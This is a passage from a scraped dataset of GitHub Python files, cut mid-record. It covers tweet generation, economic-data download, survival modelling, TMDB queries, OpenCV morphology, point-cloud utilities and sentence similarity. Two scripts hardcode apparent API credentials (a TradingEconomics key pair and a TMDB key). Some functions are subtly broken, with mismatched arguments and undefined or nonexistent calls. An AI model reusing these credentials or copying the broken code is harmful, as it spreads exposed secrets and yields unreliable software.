"program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "boto3.client", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "36912412542", "text": "import os\nimport pandas as pd\nimport random\nfrom transformers import pipeline\n\nmodel = pipeline(\"text-generation\", model=\"gpt2\")\ntalie_hist_tweets = t_df = pd.read_csv(f'{os.path.dirname(__file__)}/talies_tweets.csv').text.to_list()\nstuff_talie_likes = ['ohio', 'midwest', 'mahjong', 'the bachelor', 'yoga', 'drop dead gorgeous the movie',\n 'dog agility', 'the G train', 'ABBA', 'weed', 'psychology', 'The Mets', 'The Sims',\n 'The University of Michigan', 'journaling', 'skincare', 'Kate Bush', 'being a Taurus',\n 'kiwis', 'dog agility']\ntalies_friends = ['renzi', 'josh', 'katie', 'coco', 'jane', 'victoria', 'sarah', 'claudia', 'natalie']\n\n\ndef replace_anon_with_friend(tweet):\n ind = tweet.index('_')\n res = tweet.replace('_', '')\n friend = talies_friends[random.randrange(len(talies_friends))]\n if len(res) == 0:\n return friend\n res = res[:ind] + friend + res[ind:]\n return res\n\n\ndef generate_tweet():\n hist_tweet = talie_hist_tweets[random.randrange(len(talie_hist_tweets))]\n print(f\"remember when I said |{hist_tweet}|?\")\n thing_talie_likes = stuff_talie_likes[random.randrange(len(stuff_talie_likes))]\n print(f\"now i've got {thing_talie_likes} on my mind\")\n joke_spec_hist_tweet = f'I remebered when I said {hist_tweet}, and it made me think about ' \\\n f'{thing_talie_likes} ' \\\n f'and so here is what I thought next: '\n gen_text = model(joke_spec_hist_tweet,\n do_sample=True, top_k=50,\n temperature=0.9, max_length=100)[0]['generated_text']\n text_without_hist = gen_text[len(joke_spec_hist_tweet):]\n\n # Remove newlines.\n tweet = text_without_hist.replace('\\n', '')\\\n .replace('\"', '')\\\n .replace(',', '')\\\n .replace('@', '')\\\n .replace('https://', '')\n\n # Tokenize sentences.\n tweet_sentences = tweet.split('.')\n tweet_sentences = [t for t in tweet_sentences if len(t) > 10]\n\n # Take the first one, lowercase.\n tweet = tweet_sentences[0].lower().strip()\n if '__' in tweet:\n tweet = replace_anon_with_friend(tweet)\n return tweet\n\n\ndef generate_tweet_with_retries():\n num_retries = 100\n for try_num in range(0, num_retries):\n try:\n return generate_tweet()\n except:\n print(f'Failed, trying {num_retries - try_num} more times.')\n", "repo_name": "JohnEFerguson/taliebot", "sub_path": "taliebot/tweet_generator.py", "file_name": "tweet_generator.py", "file_ext": "py", "file_size_in_byte": 2435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "transformers.pipeline", "line_number": 6, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 18, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 26, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "10145387306", "text": "import tradingeconomics as te\nfrom datetime import datetime\nimport time\nimport pandas as pd\n\nte.login('5b47a77efd37439:5kzkij2hyxd98d4')\n\ncountries = ['mexico', 'sweden']\nindicators = ['GDP', 'interest rate']\n\ntoday = datetime.now().strftime('%Y-%m-%d')\n\ndef step(years, n):\n for i in range(0, len(years), n):\n yield years[i:i+n]\n\n\nfor c in step(countries, 1):\n print(c)\n\ndata = te.getFinancialsData(symbol='tsla:us', output_type='df')\npath_csv = r'data.csv'\npath_html = r'data.html'\ndata.to_csv(path_csv, index=False, header=True, sep='|')\ndata = data.astype(str)\ndata.round(5)\ndata.to_html(path_html)\n\n\n\n\n\n\n\n\n\n\n\n\n\n# end\n", "repo_name": "stella-vir/back_end", "sub_path": "coutry_array.py", "file_name": "coutry_array.py", "file_ext": "py", "file_size_in_byte": 635, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tradingeconomics.login", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 11, "usage_type": "name"}, {"api_name": "tradingeconomics.getFinancialsData", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "22419381176", "text": "# 81. 搜索旋转排序数组 II\n# 假设按照升序排序的数组在预先未知的某个点上进行了旋转。\n#\n# ( 例如,数组 [0,0,1,2,2,5,6] 可能变为 [2,5,6,0,0,1,2] )。\n#\n# 编写一个函数来判断给定的目标值是否存在于数组中。若存在返回 true,否则返回 false。\nfrom typing import List\n\n\nclass Solution:\n def search(self, nums: List[int], target: int) -> bool:\n # 去除首位相等的元素,这样就不会导致区间判断错误\n while len(nums) > 1 and nums[0] == nums[-1]:\n nums.pop()\n n = len(nums)\n begin = 0\n end = n - 1\n while begin <= end:\n mid = (begin + end) // 2\n if nums[mid] == target:\n return True\n if nums[0] <= nums[mid]:\n if nums[0] <= target < nums[mid]:\n end = mid - 1\n else:\n begin = mid + 1\n elif nums[0] > nums[mid]:\n if nums[mid] < target <= nums[-1]:\n begin = mid + 1\n else:\n end = mid - 1\n return False\n", "repo_name": "JackTJC/LeetCode", "sub_path": "back_search/SearchRotate2.py", "file_name": "SearchRotate2.py", "file_ext": "py", "file_size_in_byte": 1137, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "74866977765", "text": "import numpy as np\nimport scipy as sp\nimport pandas as pd\nfrom tqdm import tqdm\nimport copy\nimport time\n\nfrom jax.config import config\nconfig.update(\"jax_enable_x64\", True)\n\nimport jax.numpy as jnp\nfrom jax import random\nfrom surv_copula.main_copula_survreg_gaussian import fit_copula_survival,predict_copula_survival,check_convergence_pr,predictive_resample_survival\n\n#Import data\ndata = pd.read_csv('./data/melanoma.csv')\nt = np.array(data['t'])\ndelta = np.array(data['delta'])\nx = np.array(data['x'])\n\n#Normalize\nscale = (np.sum(t)/np.sum(delta))\nt_norm = t/scale\nmean_x = np.mean(x)\nstd_x = np.std(x)\nx_norm =(x- mean_x)/std_x\n\n#Randomize\nnp.random.seed(120)\nn = np.shape(t_norm)[0]\nind = np.random.permutation(np.arange(n))\nt_norm = t_norm[ind]\ndelta = delta[ind]\nx_norm = x_norm[ind]\n\n\n#Initialize plot and sample number\nB = 2000 #number of posterior samples\nT = 10000 #number of forward samples\nkey = random.PRNGKey(101)\ny_plot = np.arange(0,np.max(t),100)/scale\n\n\n#NONPARAMETRIC PREDICTIVE SMC#\n\n## TREATMENT ##\n#Specify a_grid to choose a\nrho_grid = np.array([0.5,0.6,0.7,0.8,0.9])\nrho_,rho_x_ = np.meshgrid(rho_grid,rho_grid)\nhyperparam_grid = np.vstack([rho_.ravel(), rho_x_.ravel()]).transpose()\n\n# #Pass grid of a_values\ncop_surv_obj = fit_copula_survival(t_norm,delta,x_norm, B,hyperparam_grid = hyperparam_grid)\n\n#Gradient\n#cop_surv_obj = fit_copula_survival(t_norm,delta,x_norm, B)\nprint('Optimal rho is {}'.format(cop_surv_obj.rho_opt))\nprint('Optimal rho_x is {}'.format(cop_surv_obj.rho_x_opt))\n\n#Compute predictive cdf for various x values for survival plot\nfor x_ in np.array([1.5,3.4,6.1]):\n\tx_norm_ = (x_- mean_x)/std_x\n\tx_plot = x_norm_*np.ones(np.shape(y_plot)[0])\n\tlogcdf_av, logpdf_av = predict_copula_survival(cop_surv_obj,y_plot,x_plot)\n\tjnp.save('plot_files/melanoma_logpdf_av_copula_x{}'.format(x_),logpdf_av)\n\tjnp.save('plot_files/melanoma_logcdf_av_copula_x{}'.format(x_),logcdf_av)\n\n#Predictive resample at x= 3.4\nx_norm_ = (3.4- mean_x)/std_x\nx_plot = x_norm_*np.ones(np.shape(y_plot)[0])\nlogcdf_pr, logpdf_pr = predictive_resample_survival(cop_surv_obj,y_plot,x_plot, T_fwdsamples = T)\n\n#Assessing convergence\n_,_,pdiff,cdiff = check_convergence_pr(cop_surv_obj,y_plot,x_plot,5,25000)\n\n#Save all files\njnp.save('plot_files/melanoma_ESS_copula',cop_surv_obj.ESS)\njnp.save('plot_files/melanoma_particle_ind_copula',cop_surv_obj.particle_ind)\njnp.save('plot_files/melanoma_logpdf_samp_copula',logpdf_pr)\njnp.save('plot_files/melanoma_logcdf_samp_copula',logcdf_pr)\njnp.save('plot_files/melanoma_pdiff_copula',pdiff)\njnp.save('plot_files/melanoma_cdiff_copula',cdiff)\njnp.save('plot_files/melanoma_rho_copula', cop_surv_obj.rho_opt)\njnp.save('plot_files/melanoma_rhox_copula', cop_surv_obj.rho_x_opt)\njnp.save('plot_files/melanoma_y_plot',y_plot)\n\n#compute cdf to obtain median function\ndy_med = 0.02\ny_plot_med = np.arange(dy_med,1.5,dy_med)\nn_x = 40\nx_grid = np.linspace(np.min(x_norm), np.max(x_norm),n_x)\nmedian_fun = np.zeros(n_x)\nfor i in range(n_x):\n\tx_plot = x_grid[i]*np.ones(np.shape(y_plot_med)[0])\n\tlogcdf_av, logpdf_av = predict_copula_survival(cop_surv_obj,y_plot_med,x_plot)\n\tmedian_fun[i] = y_plot_med[np.argmin(np.abs(np.exp(logcdf_av) - 0.5))]\n\njnp.save('plot_files/melanoma_median_fun',median_fun)\njnp.save('plot_files/melanoma_x_grid',x_grid)", "repo_name": "edfong/survival_mp", "sub_path": "run_expts/3_melanoma_full.py", "file_name": "3_melanoma_full.py", "file_ext": "py", "file_size_in_byte": 3297, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "jax.config.config.update", "line_number": 9, "usage_type": "call"}, {"api_name": "jax.config.config", "line_number": 9, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.shape", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 31, "usage_type": "call"}, {"api_name": "jax.random.PRNGKey", "line_number": 40, "usage_type": "call"}, {"api_name": "jax.random", "line_number": 40, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 50, "usage_type": "call"}, {"api_name": "surv_copula.main_copula_survreg_gaussian.fit_copula_survival", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 63, "usage_type": "call"}, {"api_name": "surv_copula.main_copula_survreg_gaussian.predict_copula_survival", "line_number": 64, "usage_type": "call"}, {"api_name": "jax.numpy.save", "line_number": 65, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 65, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 66, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 66, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 70, "usage_type": "call"}, {"api_name": "surv_copula.main_copula_survreg_gaussian.predictive_resample_survival", "line_number": 71, "usage_type": "call"}, {"api_name": "surv_copula.main_copula_survreg_gaussian.check_convergence_pr", "line_number": 74, "usage_type": "call"}, {"api_name": "jax.numpy.save", "line_number": 77, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 77, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 78, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 78, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 79, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 79, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 80, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 80, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 81, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 81, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 82, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 82, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 83, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 83, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 84, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 84, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 85, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 85, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 94, "usage_type": "call"}, {"api_name": "surv_copula.main_copula_survreg_gaussian.predict_copula_survival", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 96, "usage_type": "call"}, {"api_name": "jax.numpy.save", "line_number": 98, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 98, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 99, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 99, "usage_type": "name"}]} +{"seq_id": "23266419315", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Sep 1 09:42:56 2018\r\n\r\n@author: A103932\r\n\"\"\"\r\nimport time\r\n\r\nstart = time.time()\r\n\r\n#import sys\r\n\r\napi_key = \"92e447debf2441468e90b59d45b39608\"#sys.argv[1]\r\n\r\n\"\"\"Finding 300 most popular comedy movies relaeased 2000 or later\"\"\"\r\n\r\nimport json\r\n\r\nimport http.client\r\n\r\nconn = http.client.HTTPSConnection(\"api.themoviedb.org\")\r\n\r\npayload = \"{}\"\r\n\r\nimport numpy as np\r\n\r\nimport pandas as pd\r\n\r\nmovie_data = pd.read_csv('movie_tmdb.csv')\r\n\r\nmovie_ids = list(movie_data['Tmdb_id'].unique())\r\n\r\nvote_average = []\r\n\r\nvote_count = []\r\n\r\npopularity = []\r\n\r\npage = 1 #count for pages\r\nreq = 1 #count for requests\r\n\r\nfor movie_id in movie_ids:\r\n if req == 41:\r\n time.sleep(10)\r\n req = 1\r\n url = \"/3/movie/\"+str(movie_id)+\"?language=en-US&api_key=\"+str(api_key)\r\n conn.request(\"GET\", url, payload)\r\n res = conn.getresponse()\r\n data = res.read()\r\n vote_average.append(json.loads(data)['vote_average'])\r\n vote_count.append(json.loads(data)['vote_count'])\r\n popularity.append(json.loads(data)['popularity'])\r\n req += 1 \r\n\r\nmovie_details = pd.DataFrame({'movie_id':movie_ids, 'vote_average':vote_average, 'vote_count':vote_count,\r\n 'popularity':popularity})\r\n\r\nend = time.time()\r\n\r\nprint('Start is : '+str(start)+', End is :'+str(end)+', Time taken:'+str(end-start))\r\n\r\n\r\n", "repo_name": "NarendraGadidasu/Movie_Recommendation_Engine", "sub_path": "Archive/tmdb_ratings.py", "file_name": "tmdb_ratings.py", "file_ext": "py", "file_size_in_byte": 1378, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "time.time", "line_number": 9, "usage_type": "call"}, {"api_name": "http.client.client.HTTPSConnection", "line_number": 21, "usage_type": "call"}, {"api_name": "http.client.client", "line_number": 21, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 21, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 44, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 50, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 55, "usage_type": "call"}, {"api_name": "time.time", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "1551375313", "text": "# -*- coding: utf-8 -*-\r\nimport cv2\r\nimport numpy as np\r\n\r\ncap = cv2.VideoCapture('F:/python/image/vs_4.mp4')\r\n#cap =cv2.VideoCapture(0)\r\nwhile True:\r\n _, frame = cap.read()\r\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n\r\n #lower_red = np.array([150, 150, 50])\r\n #upper_red = np.array([180, 255, 150])\r\n\r\n lower_red = np.array([100, 43, 46])\r\n upper_red = np.array([124, 255, 255])\r\n\r\n mask = cv2.inRange(hsv, lower_red, upper_red)\r\n #lower_red 表明低于这个lower_red的值,图像值变为0\r\n #upper_red 表明高于这个upper_red的值,图像值变为0\r\n #在这个区间内图像值变为225\r\n res = cv2.bitwise_and(frame, frame, mask=mask)\r\n\r\n kernel = np.ones((15,15), np.uint8)\r\n erosion = cv2.erode(res,kernel)\r\n dilation = cv2.dilate(erosion,kernel,iterations=1)\r\n '''\r\n腐蚀:腐蚀会把物体的边界腐蚀掉,卷积核沿着图象滑动,如果卷积��对应的原图的所有像素值为1,那么中心元素就保持原来的值,否则变为零。主要应用在去除白噪声,也可以断开连在一起的物体。\r\n\r\n膨胀:卷积核所对应的原图像的像素值只要有一个是1,中心像素值就是1。一般在除噪是,先腐蚀再膨胀,因为腐蚀在去除白噪声的时候也会使图像缩小,所以我们之后要进行膨胀。当然也可以用来将两者物体分开。\r\n————————————————\r\n版权声明:本文为CSDN博主“SongpingWang”的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。\r\n原文链接:https://blog.csdn.net/wsp_1138886114/article/details/82917661\r\n'''\r\n opening = cv2.morphologyEx(mask,cv2.MORPH_OPEN,kernel) #先腐蚀,再膨胀 排除小团的物体\r\n closing = cv2.morphologyEx(mask,cv2.MORPH_CLOSE, kernel) #先膨胀再腐蚀,排除小型黑洞\r\n\r\n #cv2.imshow('frame', frame)\r\n cv2.imshow('mask', mask)\r\n #cv2.imshow('ero', erosion)\r\n cv2.imshow('di', dilation)\r\n\r\n cv2.imshow('opening',opening)\r\n cv2.imshow('closing',closing)\r\n\r\n\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'): # 此处代码是防止bug? ord 是将字符转化为相应整数\r\n # waitkey(1) 参数为1 表示延时1ms切换到下一帧图像\r\n # 0 视频暂停\r\n # 1000 延时太久,卡顿\r\n break\r\ncv2.destroyAllWindows()\r\ncv2.release()", "repo_name": "Crystal-Dragon-Liu/ML_practise", "sub_path": "image_process_practise/t9_morphological transformation.py", "file_name": "t9_morphological transformation.py", "file_ext": "py", "file_size_in_byte": 2393, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.VideoCapture", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.erode", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.dilate", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.morphologyEx", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.MORPH_OPEN", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.MORPH_CLOSE", "line_number": 35, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.release", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "41565961901", "text": "import torch\nfrom torch.autograd import Function\nfrom utils import knn_query_cuda\n\n\ndef knn_query(ctx, nsample, xyz, offset, new_xyz=None, new_offset=None):\n \"\"\"\n input: coords: (n, 3), new_xyz: (m, 3), offset: (b), new_offset: (b)\n output: idx: (m, nsample) -1 is placeholder, dist2: (m, nsample)\n \"\"\"\n if new_xyz is None or new_offset is None:\n new_xyz = xyz\n new_offset = offset\n assert xyz.is_contiguous() and new_xyz.is_contiguous()\n m = new_xyz.shape[0]\n idx = torch.cuda.IntTensor(m, nsample).zero_()\n dist2 = torch.cuda.FloatTensor(m, nsample).zero_()\n idx, dist2 = knn_query_cuda(m, nsample, xyz, new_xyz, offset.int(), new_offset.int(), idx, dist2)\n return idx, torch.sqrt(dist2)\n\n\ndef grouping(idx,\n feat,\n xyz,\n new_xyz=None,\n with_xyz=False):\n if new_xyz is None:\n new_xyz = xyz\n assert xyz.is_contiguous() and feat.is_contiguous()\n m, nsample, c = idx.shape[0], idx.shape[1], feat.shape[1]\n xyz = torch.cat([xyz, torch.zeros([1, 3]).to(xyz.device)], dim=0)\n feat = torch.cat([feat, torch.zeros([1, c]).to(feat.device)], dim=0)\n grouped_feat = feat[idx.view(-1).long(), :].view(m, nsample, c) # (m, num_sample, c)\n\n if with_xyz:\n assert new_xyz.is_contiguous()\n mask = torch.sign(idx + 1)\n grouped_xyz = xyz[idx.view(-1).long(), :].view(m, nsample, 3) - new_xyz.unsqueeze(1) # (m, num_sample, 3)\n grouped_xyz = torch.einsum(\"n s c, n s -> n s c\", grouped_xyz, mask) # (m, num_sample, 3)\n return torch.cat((grouped_xyz, grouped_feat), -1)\n else:\n return grouped_feat\n\n\n\n\n\ndef interpolation(xyz, new_xyz, feat, offset, new_offset, k=3):\n \"\"\"\n input: coords: (m, 3), new_xyz: (n, 3), color: (m, c), offset: (b), new_offset: (b)\n output: (n, c)\n \"\"\"\n assert xyz.is_contiguous() and new_xyz.is_contiguous() and feat.is_contiguous()\n idx, dist = knn_query(k, xyz, offset, new_xyz, new_offset) # (n, 3), (n, 3)\n dist_recip = 1.0 / (dist + 1e-8) # (n, 3)\n norm = torch.sum(dist_recip, dim=1, keepdim=True)\n weight = dist_recip / norm # (n, 3)\n\n new_feat = torch.cuda.FloatTensor(new_xyz.shape[0], feat.shape[1]).zero_()\n for i in range(k):\n new_feat += feat[idx[:, i].long(), :] * weight[:, i].unsqueeze(-1)\n return new_feat\n\n\n\ndef knn_query_and_group(feat,\n xyz,\n offset=None,\n new_xyz=None,\n new_offset=None,\n idx=None,\n nsample=None,\n with_xyz=False\n ):\n if idx is None:\n assert nsample is not None\n idx, _ = knn_query(nsample, xyz, offset, new_xyz, new_offset)\n return grouping(idx, feat, xyz, new_xyz, with_xyz), idx\n\n\n\ndef farthest_point_sampling(ctx, xyz, offset, new_offset):\n \"\"\"\n input: coords: (n, 3), offset: (b), new_offset: (b)\n output: idx: (m)\n \"\"\"\n assert xyz.is_contiguous()\n n, b, n_max = xyz.shape[0], offset.shape[0], offset[0]\n for i in range(1, b):\n n_max = max(offset[i] - offset[i - 1], n_max)\n idx = torch.cuda.IntTensor(new_offset[b - 1].item()).zero_()\n tmp = torch.cuda.FloatTensor(n).fill_(1e10)\n farthest_point_sampling_cuda(b, n_max, xyz, offset.int(), new_offset.int(), tmp, idx)\n del tmp\n return idx", "repo_name": "xamwise/PT-segmentation", "sub_path": "models/Zhao/trials/pointops.py", "file_name": "pointops.py", "file_ext": "py", "file_size_in_byte": 3454, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.cuda.IntTensor", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.cuda.FloatTensor", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 17, "usage_type": "attribute"}, {"api_name": "utils.knn_query_cuda", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.sign", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.einsum", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.cuda.FloatTensor", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.cuda.IntTensor", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 91, "usage_type": "attribute"}, {"api_name": "torch.cuda.FloatTensor", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 92, "usage_type": "attribute"}]} +{"seq_id": "28495063598", "text": "import numpy as np \nimport nltk\nfrom random import randint\nimport torch\nfrom models import InferSent\nfrom sklearn.metrics.pairwise import cosine_similarity\n\ndef Infersent(document1,document2):\n\n MODEL_PATH = \"infersent1.pkl\"\n params_model = {'bsize': 64, 'word_emb_dim': 300, 'enc_lstm_dim': 2048,\n 'pool_type': 'max', 'dpout_model': 0.0, 'version': 1}\n model = InferSent(params_model)\n model.load_state_dict(torch.load(MODEL_PATH))\n \n use_cuda = False\n model = model.cuda() if use_cuda else model\n W2V_PATH = 'glove/glove.6B.300d.txt'\n model.set_w2v_path(W2V_PATH)\n \n model.build_vocab_k_words(K=100000)\n \n sentences=[document1,document2]\n embeddings = model.encode(sentences, bsize=128, tokenize=False, verbose=True)\n score=cosine_similarity(embeddings[0].reshape(-1,1),embeddings[1].reshape(-1,1))\n return str(np.mean(score))\n\n ", "repo_name": "raunaknegi/similarity-checker", "sub_path": "api/infersent.py", "file_name": "infersent.py", "file_ext": "py", "file_size_in_byte": 899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "models.InferSent", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise.cosine_similarity", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "33534450600", "text": "import collections\n\na = collections.defaultdict(int)\na['A']=5\na['B']=4\na['C'] += 1 # 이렇듯 defaultdict는 디폴트 값을 0으로 해서 없는 값에 대한 연산도 error를 발생하지 않도록 해준다.\n\nprint(a)\n\nb = [1, 2, 3, 4, 5, 5, 5, 6, 6]\nc = collections.Counter(b) # 각 리스트의 원소들을 key로 하고 key들의 중복되는 개수를 value로 하는 딕셔너리를 리턴\nprint(c)\nprint(c.most_common(2)) # 가장 많이 쓰이는 2개의 요소를 추출한다.\n\n# dictionary는 python 3.7 이후부터는 입력 순서를 보존하지만 그 전에는 보존하지 않았다.\n# 이를 대비하려면 collections.OrderedDict(dictionary)를 해주어야 한다.", "repo_name": "mathjihun/Python", "sub_path": "Algorithm/collect_dict.py", "file_name": "collect_dict.py", "file_ext": "py", "file_size_in_byte": 703, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.defaultdict", "line_number": 3, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "20576201250", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[42]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# In[43]:\n\n\nsns.get_dataset_names()\n\n\n# In[44]:\n\n\niris=sns.load_dataset('iris')\n\n\n# In[45]:\n\n\niris.head()\n\n\n# In[46]:\n\n\niris.describe()\n\n\n# In[47]:\n\n\niris.value_counts()\n\n\n# In[48]:\n\n\niris['sepal_length'].nunique()\n\n\n# In[49]:\n\n\niris['petal_length'].nunique()\n\n\n# In[50]:\n\n\niris['species'].nunique()\n\n\n# 